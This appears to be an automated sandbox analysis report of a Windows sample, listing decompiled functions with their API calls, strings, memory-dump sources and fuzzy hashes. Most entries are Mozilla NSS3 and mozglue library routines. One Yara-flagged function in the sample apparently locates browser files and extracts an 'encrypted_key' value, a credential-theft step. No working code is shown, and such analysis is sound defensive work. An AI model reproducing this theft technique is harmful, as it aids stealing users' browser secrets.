                                                                                                                                                                                          Function 6C604C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C604CAF
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604CFD
                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C604D44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                          • Opcode ID: e83ea5503e7b8082553909914df970499970c80d7bb46349f8001ce0cb88f567
                                                                                                                                                                                          • Instruction ID: 724c657143d6ad62a4a3ba982a5547bceef18cadfc2aa7302061a3a3a956dbca
                                                                                                                                                                                          • Opcode Fuzzy Hash: e83ea5503e7b8082553909914df970499970c80d7bb46349f8001ce0cb88f567
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C3168B3B04951A7D73C4A259A00BF473A17BA2319F154529D8246BE94CBE1AC62C3EF
                                                                                                                                                                                          Function 6C45EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C424A68), ref: 6C45945E
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C459470
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C459482
                                                                                                                                                                                            • Part of subcall function 6C459420: __Init_thread_footer.LIBCMT ref: 6C45949F
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C45EC84
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C45EC8C
                                                                                                                                                                                            • Part of subcall function 6C4594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4594EE
                                                                                                                                                                                            • Part of subcall function 6C4594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C459508
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C45ECA1
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ECAE
                                                                                                                                                                                          • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C45ECC5
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ED0A
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C45ED19
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C45ED28
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C45ED2F
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(6C49F4B8), ref: 6C45ED59
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • [I %d/%d] profiler_ensure_started, xrefs: 6C45EC94
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                          • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                          • API String ID: 4057186437-125001283
                                                                                                                                                                                          • Opcode ID: e82f735ccf6df7f3f5c691b4c5de2348ae24c7c147e9705df4fa664e9daaa560
                                                                                                                                                                                          • Instruction ID: 9c560d843f79059294df600ad14aabbd317b2c53414fcd166fd903bba7145f5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: e82f735ccf6df7f3f5c691b4c5de2348ae24c7c147e9705df4fa664e9daaa560
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F671600124AFEF01EF24DC48FAA7739EB6626DF504214FC1987740D7399826CBE1
                                                                                                                                                                                          Function 6C562CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitToken), ref: 6C562CEC
                                                                                                                                                                                          • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C562D07
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_Now.NSS3 ref: 6C640A22
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C640A35
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C640A66
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_GetCurrentThread.NSS3 ref: 6C640A70
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C640A9D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C640AC8
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_vsmprintf.NSS3(?,?), ref: 6C640AE8
                                                                                                                                                                                            • Part of subcall function 6C6409D0: EnterCriticalSection.KERNEL32(?), ref: 6C640B19
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C640B48
                                                                                                                                                                                            • Part of subcall function 6C6409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C640C76
                                                                                                                                                                                            • Part of subcall function 6C6409D0: PR_LogFlush.NSS3 ref: 6C640C7E
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C562D22
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640B88
                                                                                                                                                                                            • Part of subcall function 6C6409D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C640C5D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C640C8D
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640C9C
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640CD1
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C640CEC
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640CFB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C640D16
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C640D26
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640D35
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C640D65
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C640D70
                                                                                                                                                                                            • Part of subcall function 6C6409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C640D90
                                                                                                                                                                                            • Part of subcall function 6C6409D0: free.MOZGLUE(00000000), ref: 6C640D99
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C562D3B
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C640BAB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640BBA
                                                                                                                                                                                            • Part of subcall function 6C6409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C640D7E
                                                                                                                                                                                          • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C562D54
                                                                                                                                                                                            • Part of subcall function 6C6409D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C640BCB
                                                                                                                                                                                            • Part of subcall function 6C6409D0: EnterCriticalSection.KERNEL32(?), ref: 6C640BDE
                                                                                                                                                                                            • Part of subcall function 6C6409D0: OutputDebugStringA.KERNEL32(?), ref: 6C640C16
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                          • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$ndl
                                                                                                                                                                                          • API String ID: 420000887-1724371414
                                                                                                                                                                                          • Opcode ID: 3c7b94ff8472e8decf399c3eb03a24b7a55d2c5e7071c663b800b01b29812469
                                                                                                                                                                                          • Instruction ID: ee27c877bb6f558ad3d517cde26f70bf90faa08b2c97b03a4cc6048fd164f669
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c7b94ff8472e8decf399c3eb03a24b7a55d2c5e7071c663b800b01b29812469
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0721B375601145EFDB009F56DDCCA463BB1EB8631DF448015E604A7A72DB308C59CBA9
                                                                                                                                                                                          Function 0003580D Relevance: 18.2, APIs: 12, Instructions: 188stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00035845
                                                                                                                                                                                          • _memset.LIBCMT ref: 00035856
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00035881
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0003589F
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 000358B3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 000358C6
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 0002819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 000321E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0003595C,?), ref: 000321F2
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000), ref: 0003596A
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00035A8C
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                            • Part of subcall function 00028048: LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                            • Part of subcall function 00028048: LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00035A18
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,00056645), ref: 00035A35
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035A54
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056A8C), ref: 00035A65
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4109952398-0
                                                                                                                                                                                          • Opcode ID: 696a071f6b733fa673fa08a6238210dd8d5f1af26888f18724857198fb085d01
                                                                                                                                                                                          • Instruction ID: f16dd5f103a38c1d23aa697ead09fa072cc423f10ecec41e66b6fc0feec8a7f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 696a071f6b733fa673fa08a6238210dd8d5f1af26888f18724857198fb085d01
                                                                                                                                                                                          • Instruction Fuzzy Hash: 74713BB5C4022D9BDF61DF60DC45ACEB7BAAB98310F0405E5E908A3251EB329FA58F51
                                                                                                                                                                                          Function 6C602D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C602D9F
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: EnterCriticalSection.KERNEL32(?,?,?,6C51F9C9,?,6C51F4DA,6C51F9C9,?,?,6C4E369A), ref: 6C4BCA7A
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4BCB26
                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C602F70,?,?), ref: 6C602DF9
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C602E2C
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E3A
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E52
                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C66AAF9,?), ref: 6C602E62
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E70
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602E89
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602EBB
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602ECB
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C602F3E
                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C602F4C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                          • Opcode ID: 65b7858ed1c9ad673fed05c3d14804af26b8b0af89b1e51779a816794fa52740
                                                                                                                                                                                          • Instruction ID: 14fce65aba24c5aad106615b4ddfc950623b6234e8f98fae625231aaae60b6bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b7858ed1c9ad673fed05c3d14804af26b8b0af89b1e51779a816794fa52740
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0616BB5E002068BEB04CFA8D984B9EB7B5EF59348F144428EC55B7B41E731E845CBA5
                                                                                                                                                                                          Function 6C4B4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4C97
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CB0
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4CC9
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D11
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D2A
                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D4A
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D57
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4D97
                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DBA
                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C4B4DD4
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DE6
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C4B3921,6C6914E4,6C5FCC70), ref: 6C4B4DEF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3388019835-0
                                                                                                                                                                                          • Opcode ID: 643b4f6b8b806219b7dc5980479c761a44e14aa53a4f637db5eee4d2bf790c5a
                                                                                                                                                                                          • Instruction ID: c3884230cd982c4ee4f7835a220294584677b7ac49cb34355b720f416ce91351
                                                                                                                                                                                          • Opcode Fuzzy Hash: 643b4f6b8b806219b7dc5980479c761a44e14aa53a4f637db5eee4d2bf790c5a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E41A0B5A04711CFCB00EF79C884D5977F8BF46354F164629D898A7700E730E885CBA5
                                                                                                                                                                                          Function 00048B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3833677464-0
                                                                                                                                                                                          • Opcode ID: a2c9c4f1816dfd6ec6938e27141477249c0c90ab003bc2787292d758f6a6ea07
                                                                                                                                                                                          • Instruction ID: f11a9d47624d1f0427d550f79c96c9ccbf74c7442458248e16b3e8878cd41248
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2c9c4f1816dfd6ec6938e27141477249c0c90ab003bc2787292d758f6a6ea07
